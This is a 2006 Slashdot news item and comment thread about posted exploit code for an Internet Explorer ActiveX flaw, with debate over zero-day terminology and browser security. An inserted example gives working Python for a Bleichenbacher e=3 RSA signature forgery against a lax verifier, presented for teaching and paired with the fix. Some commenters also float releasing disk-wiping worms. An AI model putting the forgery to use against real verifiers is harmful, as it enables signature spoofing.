Code Posted For New IE Exploit

Posted by kdawson on Sun Sep 17, 2006 07:05 AM
from the not-quite-zero-day dept.
PC World is reporting that two days ago hackers posted code for a new vulnerability in Internet Explorer that could allow drive-by takeover of a vulnerable PC. Security companies say that no exploits using the "daxctle" vulnerability have yet been found in the wild, but they are taking the new threat seriously. Symantec calls the bug "critical" and Secunia rates it highly critical, the most severe rating. The hackers who posted the sample code, xsec.org, refer to it as a "0day" exploit. The article quotes another security expert who calls this label "a stretch." Update: 09/17 18:00 GMT by C: Fixed link to XSec. Thanks for pointing that one out, folks.
  • by Anonymous Coward on Sunday September 17 2006, @07:08AM (#16124212)
    That's xsec.org [xsec.org] not xsec.com
  • Moo (Score:4, Insightful)

    by Chacham (981) on Sunday September 17 2006, @07:22AM (#16124237) Homepage Journal
    Another ActiveX exploit. *yawn*

    If you want to be safe in IE, turn off ActiveX from untrusted sites. Hasn't this been known since day one?

    News would be if ActiveX was tested and found to be safe.

    • Re: (Score:3, Interesting)

      by vhogemann (797994)
      A better alternative would be not use IE at all.

      I know most users just don't care, or don't know better. But what about developers and companies? These should be treating IE like a plague, and using it only when there's no other suitable alternatives, on a sandboxed environment.

      I used to care about IE compatibility when I designed my pages... but not anymore. I realized that most business already expect some kind of requirements for the software you sell or build for them, mine is a modern browser, with dec
      • Re: (Score:2, Informative)

        by trezor (555230)

        Switch to Linux and watch all my applications which I need to do my job fail. Yes, that sounds like a plan. For the record I'm a .NET developer who needs Visual Studio and SQL Server to do my work.

        You may find it hard to believe but Windows is a pretty damn secure OS, given that the one using it knows what he's doing. I'm not using MSIE, I'm not using Windows Media Player. And I have yet to have my machine BSOD, get infected with spyware/virus nor have to reinstall it periodically because it's unrespons

        • I'm sorry, but you're wrong. Linux is much more secure for most users. If you can't install the OS, and use it, you won't have any security problems.
          • yes, and you can reduce your risk of car accidents by moving into the middle of the sahara desert. The statement may be true, but it's not very useful. As for grandparent, so you develop w/ .NET, that's great for you too. I believe that VS is in the WINE list of apps. You've picked your platform, but that doesn't mean that you've got rock-solid justification for it. Ultimately the platform you pick is about your laziness, and what you want to be lazy about.
    • by elronxenu (117773) on Sunday September 17 2006, @07:52AM (#16124302) Homepage
      Perhaps because the first bug you mentioned was posted 4 months ago, you can resolve it by upgrading your kernel, and almost nobody would run an application chrooted under an SMBFS network filesystem anyway.

      The second bug is only a DOS, it won't give an attacker sweet r00t permissions. And it's also 4 months old news.

      The third bug doesn't result in any privilege escalation because the kextload program isn't setuid, you'd need to find some other vulnerability in a program which uses kextload.

      And the fourth bug is a month old already, hasn't been proven to be exploitable (more likely to simply crash firefox), and is easily resolved by upgrading firefox.

  • Since this was dated September 17, make that four days ago, not two.

    Check the date on the xsec.org page referred to, daxctle2.c [xsec.org]. milw0rm 2358 [milw0rm.org] was a re-publication of this, also posted up on 09/13/2006. Republication happened at other exploit advisory sites as well, such as the SecuriTeam(TM) site, where, for some strange reason, the exploit was published twice, redundantly.

    The formal vulnerability advisories SA21910 [secunia.com] and FrSIRT/ADV-2006-3593 [frsirt.com], from Secunia and FrSIRT respectively, posted on 09/14/2006
    • ``the exploit was published twice, redundantly''

      And you are repeating yourself, twice, redundantly, saying the same thing multiple times without adding new information. ;-)
  • by wfberg (24378) on Sunday September 17 2006, @07:50AM (#16124296)
    The reason it's not a 0day exploit is because some other dude already discovered the vulnerability, but didn't disclose it to the public? And that second guy is sitting on another 3 or 4 vulnerabilities?

    I'm sorry, what's the definition of 0day exploit these days? If not exploit code for which there is no patch available, then what?

    Can we now use "responsible disclosure" to argue away the fact that actual computer systems are at risk of being exploited right here and now, by saying "yeah, well, you got rooted and all, but we knew about that bug, so it doesn't count, even though we don't have a patch yet."?

    Can we now take comments that the programmers left in the code ("// does this work?" "/* coded while druk */" "//BUGBUG") as an excuse to completely ignore actual vulnerabilities?

    And hey, if TWO researchers come up with this vulnerability seemingly independently, what are the chances of the exploit already circulating in the black hat community? Close to 100%?

    By my definition you've got your negative-day and your zero-day exploits. Negative-day exploits; no patch yet. Zero-day; the patch has just been issued, so might as well give your exploit to scriptkiddies and botnet operators to use on the systems that don't patch early/often enough. Obviously, a negative-day exploit usually isn't going to be used on a large scale, because your average blackhatter wants to keep it in his toolkit to attack well-patched systems; after all, it's what gives him (and his leet skillz) an edge. Once patchday arrives, you might as well give it to some noobs, because they might be interested in unpatched targets, while a leet blackhatter is not.

    So no, it's not a "stretch" to call it 0day. It's negative day, even.
    • by n0-0p (325773)
      I think your definition of zero day is ops-centric, and not security-centric. In this post [slashdot.org] I give the generally accepted definition in the security community, which agrees with Moore's statement. To summarize, the security community only uses 0-day to refer to undisclosed vulnerabilities, and it does not address patch lag.
      • by wfberg (24378)
        Undisclosed to whom? The second guy seemed to be sitting on the vulnerability. He might've disclosed to Microsoft, but has the public learned of this vulnerability before? If not, they can't be taking any precautions.
        • by n0-0p (325773)
          I assumed the qualifier was understood; I meant publicly disclosed, not just disclosed to the vendor. Also, I'm not sure if you're familiar with how disclosure works, but it's not in Moore's best interests to reveal that he's sitting on vulnerabilities unless he intends to disclose them soon. So he may be practicing responsible disclosure and allowing the vendor a reasonable amount of time to complete a patch. Or he may have other reasons for waiting.

          Security disclosure in general is a pretty complicated ga
    • Re: (Score:2, Informative)

      by spinja (994674)
      The reason I don't consider it "0day" is that a public tool exists that will discover this bug in its default configuration (AxMan). Anyone who took the time could run the tool, discover the bug, and write the exploit. The tool was released on August 1st and this particular bug was reported to Microsoft in late July. Since all of this information was *widely* publicized at the time of release ( a couple dozen articles on AxMan [blogspot.com] ), I have a hard time considering any of the bugs it turns up "0day" in the normal
  • Does not affect IE7 (Score:4, Interesting)

    by I'm Don Giovanni (598558) on Sunday September 17 2006, @08:12AM (#16124349)
    This does not affect IE7:
    http://blogs.msdn.com/ie/archive/2006/09/15/756736.aspx [msdn.com]

    (Just for edification. ;-))
    • by rs232 (849320)
      Yea, by disabling ActiveX and removing Direct Animation. But does that actually fix the defects in the controls themselves?
    • I tried a bunch of ActiveX vulnerabilities for IE6 in IE7. Some didn't even work in IE6 (probably because I didn't have Office or some other MS ActiveX controls). Only 2 out of 15-20 worked in IE7.
    • by Psykechan (255694) on Sunday September 17 2006, @09:54AM (#16124680)
      Your link points out that IE7 is vulnerable but it will prompt you to run the ActiveX control before hosing your system. From the average user's point of view, they get a message asking to run something created and signed by Microsoft for the page to load. Tell me how many average users, even the relatively computer savvy, will allow the control to run?

      Throwing a constant barrage of OS/browser security pop-ups on the screen does not make it secure. Making it so that an exploitable control can be completely removed and not just "effectively removed" from the system helps make the system more secure, but this is just a workaround. If the control was designed to be able to grant system level privileges to a web page then it's time to go back to the proverbial drawing board.

      If it wasn't designed that way, then patch it when you first hear about it over a month ago [securityfocus.com] and stop complaining about people releasing it to the public. I would rather have everyone know about it than have just Microsoft, a few security people, and several black hats knowing.
  • Real Damage (Score:5, Funny)

    by nurb432 (527695) on Sunday September 17 2006, @09:40AM (#16124642) Homepage Journal
    whatever happened to exploits ( be it virus, trojan, whatever ) that caused some REAL damage?

    All this whimy-ass 'botnet' garbage needs to end. We need something that totally kills windows when you get infected. Get the people pissed off enough to force microsoft into doing something.
    • whatever happened to exploits ( be it virus, trojan, whatever ) that caused some REAL damage?

      3. Profit. Folks found there was money to be made off of a bot net under your control. Not uncommon to see an infected system patch itself so others can't infect the system.
      • There has to be some evil person out there that hasn't sold out to the man... In my day, it was the challenge of doing something that drove us, not the recognition.. ( be it money or peers )
    • I always wanted to infect an entire botnet with something that overwrote the bootsector with code that didn't boot windows, just printed "This computer was infected with A Virus and was caught attacking other computers online. Your computer has now been disabled, see a computer technician to fix this and clean the virus off your machine." That way their info is still safe, but they can't boot windows to start the bot anymore.
    • All this whimy-ass 'botnet' garbage needs to end. We need something that totally kills windows when you get infected. Get the people pissed off enough to force microsoft into doing something.

      I for one am actually surprised this hasn't happened yet. Say a worm that infects 20 others then formats the hard drive. Or perhaps break into a botnet (they are not that secure) and wipe some millions of Windows PCs at once. It would not be hard to do, let your Windows get infected, figure out how they control it

  • by shaitand (626655) on Sunday September 17 2006, @10:19AM (#16124754) Homepage Journal
    Either they released the exploit code before the hole was patched or not.
  • by Myria (562655) on Sunday September 17 2006, @06:00PM (#16126667)
    If you look at Firefox security bugs and IE security bugs, you'll see that there are more Firefox bugs than MSIE bugs in the exploit lists. There is, however, a big difference.

    When Microsoft finds a security hole themselves, they don't tell anyone, and they don't release a patch. They fix it in the tree for the next release of the OS. The only time they release a patch is when someone else finds the bug. The reason they do this is because if they release a patch, people will "bindiff" it against the previous version and find what is changed so that they can make exploits to use against unpatched users. You can't realistically "bindiff" XP vs. Vista, so they can obscure their security updates inside Vista.

    Firefox instead will issue patches no matter who finds them. This is why Firefox appears to have more bugs - you always see them get fixed.

    Melissa
  • Plugin for IE (Score:3, Interesting)

    by univgeek (442857) on Sunday September 17 2006, @10:49PM (#16127758)
    Or whatever they are called.

    Why do people use IE? Mostly because of Intranet sites which serve up IE only content and work badly or not-at-all with other browsers. How 'bout an IE plugin which opens only Intranet/trusted sites in IE and opens all else in an external safe browser? Or is this unlikely to be useful?
    • Funny you use Emacs-W3M in your "IE alternative" joke. It was recently removed from Gentoo because it is unmaintained and may not work with future versions of Emacs.
    • Re: (Score:3, Interesting)

      by makomk (752139)
      Considering that Firefox is the more common browser on Slashdot, how about doing a story about Firefox 1.5.07 fixing four separate critical heap corruption exploits and an honest to god RSA signature spoofing exploit?

      Key word: fixing. As far as I can tell, this security hole is currently unpatched.
      • Granted, now they are fixed, but the exploits were known for at least several days before the update was made available (and another few days before the automatic updates picks up on it). Similarly we can probably expect a Microsoft patch within a week (as has been the typical delay for more critical problems for some time, granted, the WMF exploit took 9 days, but that unfortunately happened during the holidays).
    • Re:Firefox 1.5.07? (Score:4, Insightful)

      by Pecisk (688001) on Sunday September 17 2006, @07:52AM (#16124301)
      Probably because there is code in the wild for this exploit and the bug itself is still unfixed?
      • Re: (Score:3, Insightful)

        by RonnyJ (651856)
        That's contrary to what the second line in the summary says, though you've still been modded up despite posting no evidence to back your claim up.

        Security companies say that no exploits using the "daxctle" vulnerability have yet been found in the wild

    • Slashdot has done stories on bugs in Firefox. See ..

      Slashdot | 611 Defects, 71 Vulnerabilities Found In Firefox [slashdot.org]

      Firefox Analyzed for Bugs by Software [slashdot.org]

      Spyware Disguises Itself as Firefox Extension [slashdot.org]

      I've also noticed how the same kind of comments from the Winpologists get modded up very quickly.

      was Re:Firefox 1.5.07?
      • There is no apologizing for exploits, it is bad whoever has them. On the other hand the nature of the last round of exploits in Firefox is rather really interesting, and as such newsworthy. The cryptographic signature exploit especially warrants a rather interesting technical discussion.
        • by rs232 (849320)
          Yea, "On the other hand .." lets not talk about bugs in IEXPlorer.
        • On the other hand the nature of the last round of exploits in Firefox is rather really interesting, and as such newsworthy. The cryptographic signature exploit especially warrants a rather interesting technical discussion.

          If you are interested in the work on RSA signatures, check out this OpenPGP posting [imc.org]. The chances are that there are other RSA signature implementations out there that are vulnerable to this sort of subversion and it will be interesting to see what other products actually publish fixes an
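      The signature bug discussed in this thread is Daniel Bleichenbacher's e=3 forgery against sloppy PKCS#1 v1.5 parsing (the NSS fix shipped in Firefox 1.5.0.7, CVE-2006-4340). The following is an added example written for this page, not code from Mozilla, NSS or the OpenPGP posting linked above; key generation, the two verifiers and the forger are all illustrative and the "certificate" strings are constructed sample input. It shows why a verifier that only checks that DigestInfo||hash follows the 00 separator, without checking that the hash is the *last* thing in the block, can be fooled with nothing but the public key: build `00 01 FF 00 || DigestInfo || hash` followed by zeros, take the integer cube root rounded up, and cubing it reproduces the prefix exactly while only disturbing the trailing bytes the lax verifier never looks at.

```python
"""Bleichenbacher-style e=3 RSA PKCS#1 v1.5 signature forgery against a lax verifier.

Added example for illustration (not code from Firefox/NSS). Key generation,
the lax and strict verifiers and the forger are all written here.
"""
import hashlib
import random

# DER DigestInfo prefix for SHA-256, as fixed by PKCS#1 (RFC 3447).
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")
E = 3


def is_probable_prime(n, rounds, rng):
    """Miller-Rabin primality test (probabilistic)."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = rng.randrange(2, n - 1)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_prime(bits, rng):
    """Random prime p with p % 3 == 2, so gcd(3, p-1) == 1 and e=3 is usable."""
    while True:
        p = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if p % 3 == 2 and is_probable_prime(p, 32, rng):
            return p


def keygen(bits=2048, seed=20060917):
    rng = random.Random(seed)   # fixed seed only so the example is reproducible
    p = gen_prime(bits // 2, rng)
    q = gen_prime(bits // 2, rng)
    n = p * q
    d = pow(E, -1, (p - 1) * (q - 1))
    return n, d


def emsa_pkcs1_v15(msg, k):
    """Correct EMSA-PKCS1-v1_5 encoding: 00 01 FF..FF 00 DigestInfo||hash."""
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def sign(msg, n, d):
    k = (n.bit_length() + 7) // 8
    return pow(int.from_bytes(emsa_pkcs1_v15(msg, k), "big"), d, n)


def verify_lax(msg, sig, n):
    """Buggy verifier: walks the padding, then only checks that DigestInfo||hash
    appears right after the 00 separator. Whatever follows the hash is ignored,
    which is exactly what the forgery exploits."""
    k = (n.bit_length() + 7) // 8
    em = pow(sig, E, n).to_bytes(k, "big")
    if em[:2] != b"\x00\x01":
        return False
    sep = em.find(b"\x00", 2)
    if sep < 0 or any(b != 0xFF for b in em[2:sep]):
        return False
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return em[sep + 1:sep + 1 + len(t)] == t


def verify_strict(msg, sig, n):
    """Correct verifier: recompute the full encoding and compare all k bytes."""
    k = (n.bit_length() + 7) // 8
    em = pow(sig, E, n).to_bytes(k, "big")
    return em == emsa_pkcs1_v15(msg, k)


def icbrt_ceil(x):
    """Smallest integer s with s**3 >= x (binary search, exact on big ints)."""
    lo, hi = 0, 1 << ((x.bit_length() + 2) // 3 + 1)
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** 3 < x:
            lo = mid + 1
        else:
            hi = mid
    return lo


def forge(msg, n):
    """Forge a signature for msg using only the public key (n, e=3).
    With a 2048-bit n the cube-root rounding error is below 2**1360, far
    smaller than the ~1600 bits of trailing 'garbage' the lax verifier skips,
    so the prefix 00 01 FF 00 || DigestInfo || hash survives cubing intact."""
    k = (n.bit_length() + 7) // 8
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    prefix = b"\x00\x01\xff\x00" + t
    target = int.from_bytes(prefix + b"\x00" * (k - len(prefix)), "big")
    return icbrt_ceil(target)


def demo():
    n, d = keygen()
    msg = b"CN=www.example.com"          # constructed sample 'certificate' body
    real = sign(msg, n, d)
    fake = forge(b"CN=attacker.example", n)   # no private key involved
    return {
        "real_sig_strict": verify_strict(msg, real, n),
        "forged_sig_lax": verify_lax(b"CN=attacker.example", fake, n),
        "forged_sig_strict": verify_strict(b"CN=attacker.example", fake, n),
    }


if __name__ == "__main__":
    print(demo())
```

      Running it shows the legitimate signature passing the strict verifier, the forged one passing the lax verifier, and the strict verifier rejecting the forgery. The fix is the one-line idea in `verify_strict`: rebuild the whole expected block and compare every byte, rather than parsing the padding and hunting for the hash. The forgery needs a small public exponent (here 3) and enough trailing room after the hash, which is why it bites on 2048-bit keys with e=3 and not on e=65537.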

    • Re:Firefox 1.5.07? (Score:5, Insightful)

      by Wylfing (144940) <brian@wyl[ ]g.net ['fin' in gap]> on Sunday September 17 2006, @08:34AM (#16124416) Homepage Journal

      Considering that Firefox is the more common browser on Slashdot, how about doing a story about Firefox 1.5.07 fixing four separate critical heap corruption exploits and an honest to god RSA signature spoofing exploit? These stories about IE exploits come off as pure Microsoft-hate masturbation.

      OK, smarty, I will explain the difference to you. On one hand we have Firefox, which is a piece of software that is free in both senses, and you can use it, or not use it, or delete from your system, or whatever you want. On the other hand we have Internet Explorer, which is forced upon you via "leveraging," you cannot remove, and you must use because of contrived tie-ins to fundamental system functions.

      If there is an exploit for Firefox, I can shrug my shoulders and use any of a dozen other browsers to look at web pages until it gets fixed. Or I can choose to continue using Firefox anyway, despite the risk. It's my choice. However, if there is an exploit in Internet Explorer, I am just plain screwed. I can't switch the goddamn thing off or remove it. Hell, there are plenty of applications and services that will gleefully launch IE of their own accord and start loading internets from God knows where, and there's no way for me to stop it. Because of Microsoft's predatory practices, I have no choice in the matter (except to abandon Windows altogether, which is also not an option -- see how all my choices have been removed?). You're damn right people are a lot more upset when exploits turn up in IE. We are required to suffer the fallout from them.

      • by RonnyJ (651856)
        You didn't actually address anything of the issue raised about Slashdot covering IE security issues more than Firefox issues, instead you went off on a wild tangent about how IE is integrated into the system.

        Sure, you can talk all you like about Firefox and other browsers being optional, etc., but that's not the issue being raised.
        • Someone else already mentioned that Firefox bugs actually get *fixed*, and often don't have exploits available until after they're disclosed.

          This bug is with a required piece of system software that you can't turn off, *and* it's not fixed yet, *and* there is a working exploit available. If you can think of other similar situations that aren't reported, please, feel free to submit them. Otherwise, your apples don't belong in this orange tree.
        • You didn't actually address anything of the issue raised about Slashdot covering IE security issues more than Firefox issues, instead you went off on a wild tangent about how IE is integrated into the system.

          Slashdot covers IE security issues more often than Firefox security issues because IE gets new exploits much more often than Firefox, and since IE is used in a lot more machines than Firefox, IE security issues have far more potential for destruction than Firefox security issues, making them more ne

      • by suv4x4 (956391)
        If there is an exploit for Firefox, I can shrug my shoulders and use any of a dozen other browsers to look at web pages until it gets fixed. Or I can choose to continue using Firefox anyway, despite the risk. It's my choice. However, if there is an exploit in Internet Explorer, I am just plain screwed. I can't switch the goddamn thing off or remove it.

        I'm getting tired of explaining this, but here we go again: do you notice the shiny E on your desktop? This is IE. Now, if you're thinking of double clicking
      • by RonnyJ (651856)
        The presence of this news item doesn't show bias.

        However, I would suggest that the lack of news items regarding security flaws in Firefox does show bias.
      • Sure, after a week of them being public knowledge (a few days for the fix to turn into a release, another few for the release to get out the door), which, coincidentally, is largely the same turnaround that Microsoft has had on serious flaws as of late.
    • Re: (Score:3, Informative)

      by n0-0p (325773)
      A 0-day refers to an undisclosed vulnerability; however, some people have stretched the definition to mean unpatched vulnerability. It's considered a stretch because an unpatched vulnerability is still known, so precautions can be taken. With a true 0-day vulnerability/exploit, you would have no knowledge of the issue and no way of protecting specifically against it.
    • Re: (Score:2, Funny)

      by rolandog (834340)
      In capitalist America, your computer can have 'safe sex' by using the Firefox condom and taking the 'NoScript' pill.